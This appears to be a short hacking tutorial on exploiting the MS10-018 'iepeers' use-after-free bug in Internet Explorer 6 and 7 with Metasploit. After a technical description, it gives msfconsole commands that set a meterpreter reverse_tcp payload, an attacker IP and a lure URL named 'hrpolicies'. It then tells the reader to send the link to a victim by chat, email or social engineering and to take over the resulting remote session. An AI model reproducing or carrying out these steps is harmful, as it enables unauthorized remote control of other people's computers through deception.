This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
0 – (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista (default)
1 – IE 6 SP0-SP2 (onclick)
2 – IE 7.0 (marquee)
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/ms10_018_ie_behaviors
Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.1.6 (IP of Local Host)
Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.1.6 (This must be an address on the local machine)
Msf exploit (ms10_018_ie_behaviors)>set uripath hrpolicies (The Url to use for this exploit)
Msf exploit (ms10_018_ie_behaviors)>exploit
Now an URL you should give to your victim //192.168.1.6:8080/hrpolicies
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“